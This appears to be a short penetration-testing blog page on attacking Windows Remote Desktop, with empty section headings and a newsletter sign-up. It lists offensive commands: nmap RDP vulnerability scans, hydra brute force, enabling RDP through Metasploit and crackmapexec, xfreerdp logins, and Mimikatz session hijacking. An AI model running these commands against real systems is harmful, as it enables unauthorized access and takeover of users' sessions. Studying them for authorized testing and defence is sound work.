Welcome, today I am writing about RDP Penetration Testing fundamentals, I will explain how to enumerate Remote Desktop Service and how to use it to escalate privileges.

RDP Introduction

RDP Penetration Testing

RDP Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt rdp


use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1


crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable

Post Exploitation

Connecting to RDP

xfreerdp /v:'' /u:'' /p:''
xfreerdp /v:'' /u:'' /p:'' +clipboard
#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP


RDP Exploits


SMTP Penetration Testing

SNMP Penetration Testing

SSH Penetration Testing

NetBios Penetration Testing

FTP penetration testing

RDP Hacking

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.


Hacking tips!

We don’t spam! Read our privacy policy for more info.